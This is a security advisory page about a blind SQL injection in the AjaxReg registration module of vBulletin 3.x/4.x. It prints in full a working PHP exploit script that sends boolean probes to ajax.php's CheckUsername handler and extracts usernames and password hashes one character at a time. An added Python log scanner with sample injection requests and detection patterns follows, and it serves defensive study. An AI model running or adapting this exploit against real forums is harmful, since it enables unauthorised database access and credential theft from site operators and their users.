Release date:
Updated on:
Affected Systems:
vBulletin
Description:
--------------------------------------------------------------------------------
Bugtraq id: 56877
vBulletin is a widely used, customizable forum software suite. AjaxReg is an AJAX-based registration module for it that validates registration fields in real time.
The AjaxReg module of vBulletin contains a SQL injection vulnerability in its implementation. An attacker who exploits it successfully can read the contents of the database without authorization.
<* Source: Cold z3ro *>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users bear the risk themselves!
#!/usr/bin/php
<?
# vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit
# https://www.example.com/-4HcW64E57CI/ULWN9mDnK8I/AAAAAAAAABo/cc0UA9eV_ak/s640/11-26-2012%25206-02-5s3%2520AM.png
# Livedemo: http://www.example.com/watch?v=LlKaYyJxH7E
# Check it: http://www.example.com/vBulletin/clientscript/register.js

function usage()
{
    echo
    "\n [+] vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit " .
    "\n [+] Author: Cold z3ro " .
    "\n [+] Site: http://www.example.com | www.example.com " .
    "\n [+] vendor: http://www.example.com/forum/showthread.php?t=144869 " .
    "\n [+] Usage: php 0day.php " .
    "\n [+] Ex.: php 0day.php www.example.com/vBulletin/1 abcdefghijklmnopqrstuvwxyz " .
    "\n [+] Note.: Its a 0day exploit \n";
    exit();
}

# Sends one boolean probe and returns true when the response reports the username as invalid.
function check($hostname, $path, $field, $pos, $usid, $char)
{
    $char = ord($char);
    $inj = 'ajax.php?do=CheckUsername&param=';
    $inj .=
    "admin'+and+ascii(substring(SELECT/**/{$field}/**/from/**/user/**/where/**/userid={$usid}),{$pos},1)={$char}/*";
    $culr = $hostname . $path . $inj;
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $culr);
    curl_setopt($curl, CURLOPT_HEADER, 1);
    curl_setopt($curl, CURLOPT_VERBOSE, 0);
    ob_start();
    curl_exec($curl);
    curl_close($curl);
    $con = ob_get_contents();
    ob_end_clean();
    if (eregi('invalid', $con))
        return true;
    else
        return false;
}

# Walks the key alphabet position by position, printing each character as it is confirmed.
function brutechar($hostname, $path, $field, $usid, $key)
{
    $pos = 1;
    $chr = 0;
    while ($chr < strlen($key))
    {
        if (check($hostname, $path, $field, $pos, $usid, $key[$chr]))
        {
            echo $key[$chr];
            $chr = -1;
            $pos++;
        }
        $chr++;
    }
}

if (count($argv) != 4)
    usage();
$hostname = $argv[1];
$path = $argv[2];
$usid = $argv[3];
$key = $argv[4];
if (empty($key))
    $key = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
echo "[+] Username :";
brutechar($hostname, $path, "username", $usid, $key);
echo "\n [+] Password :";
brutechar($hostname, $path, "password", $usid, $key);
echo "\n [+] Done ..";
echo "\n [+] It's not fake, its real .";
# Word to 1337day.com, stop scaming me
?>
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
vBulletin
---------
At the time of writing, the vendor has not released a patch or upgrade. Users of the software are advised to watch the vendor's homepage for the latest version:
http://www.vbulletin.com/
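While no vendor fix is available, a defender's interim measure is to watch the web server access log for the request shape this advisory describes: a GET to ajax.php with do=CheckUsername whose param value carries a quoted boolean condition, an ascii(substring(...)) character oracle against the user table, inline-comment whitespace (/**/) and a trailing SQL comment, repeated many times from one client. The following Python script is an added example written for this page; it is not part of the advisory, the exploit, or vBulletin. It parses constructed Apache-style access-log lines (sample data, not real traffic; the IP addresses, timestamps and paths are invented), URL-decodes the param value once, normalizes the comment-based spacing, and reports only requests that show the character-oracle signature or at least two independent indicators, so that a legitimate name containing an apostrophe is not flagged on its own.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format log lines for illustration only (not real traffic).
# Lines 2 and 3 mimic the probe shape described in the advisory; line 5 is a benign
# username with an apostrophe, included to show that a lone quote does not alert.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2012:06:02:53 +0000] "GET /forum/ajax.php?do=CheckUsername&param=alice HTTP/1.1" 200 312 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2012:06:02:54 +0000] "GET /forum/ajax.php?do=CheckUsername&param=admin'+and+ascii(substring((SELECT/**/password/**/from/**/user/**/where/**/userid=1),1,1))=97/* HTTP/1.1" 200 298 "-" "php-curl"
203.0.113.9 - - [10/Dec/2012:06:02:55 +0000] "GET /forum/ajax.php?do=CheckUsername&param=admin%27%20and%20ascii%28substring%28%28SELECT%2F%2A%2A%2Fusername%2F%2A%2A%2Ffrom%2F%2A%2A%2Fuser%2F%2A%2A%2Fwhere%2F%2A%2A%2Fuserid%3D1%29%2C2%2C1%29%29%3D100%2F%2A HTTP/1.1" 200 298 "-" "php-curl"
203.0.113.7 - - [10/Dec/2012:06:03:10 +0000] "GET /forum/showthread.php?t=1 HTTP/1.1" 200 9012 "-" "Mozilla/5.0"
203.0.113.8 - - [10/Dec/2012:06:03:11 +0000] "GET /forum/ajax.php?do=CheckUsername&param=o'neil HTTP/1.1" 200 312 "-" "Mozilla/5.0"
"""

# Apache combined log format: client, identd, user, [timestamp], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Independent indicators of the blind-injection shape aimed at the CheckUsername handler.
# Dict order is the order in which indicator names are reported.
INDICATORS = {
    "quote_then_boolean": re.compile(r"'\s*(and|or)\b", re.I),
    "char_oracle": re.compile(r"\bascii\s*\(\s*substr(ing)?\s*\(", re.I),
    "subselect_user_table": re.compile(r"\bselect\b.+\bfrom\s+\w*user\b", re.I),
    "trailing_comment": re.compile(r"(/\*|--\s|#)\s*$"),
}


def normalize(value: str) -> str:
    """Collapse the /**/ comment-as-whitespace trick and runs of whitespace to single spaces.

    The value is expected to be URL-decoded once already (parse_qs does that);
    nested encodings are deliberately not decoded a second time here.
    """
    value = value.replace("/**/", " ")
    return re.sub(r"\s+", " ", value).strip()


def analyze_param(value: str) -> list:
    """Return the names of all indicators matched by a normalized param value."""
    text = normalize(value)
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def scan_log(text: str) -> list:
    """Return one finding per suspicious CheckUsername request in the log text."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if not parts.path.endswith("/ajax.php"):
            continue
        qs = parse_qs(parts.query)
        if qs.get("do", [""])[0].lower() != "checkusername":
            continue
        for param in qs.get("param", []):
            matched = analyze_param(param)
            # A stray apostrophe is common in real names (o'neil, d'or), so require the
            # character-oracle signature or at least two independent indicators.
            if "char_oracle" in matched or len(matched) >= 2:
                hits.append({
                    "ip": m["ip"],
                    "ts": m["ts"],
                    "indicators": matched,
                    "param": normalize(param),
                })
    return hits


def offenders(text: str) -> dict:
    """Count findings per client address; a blind extraction produces many probes from one source."""
    return dict(Counter(h["ip"] for h in scan_log(text)))


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} {",".join(hit["indicators"])} :: {hit["param"]}')
    print("probe counts per client:", offenders(SAMPLE_LOG))
```

The per-client count is the more robust signal: one probe per candidate character and per position means a single extraction run generates hundreds of near-identical requests, so even a rule that only counts CheckUsername requests per client per minute would surface this traffic. The indicator list is there to give the alert a reason that an analyst can read, not to be a complete SQL injection grammar.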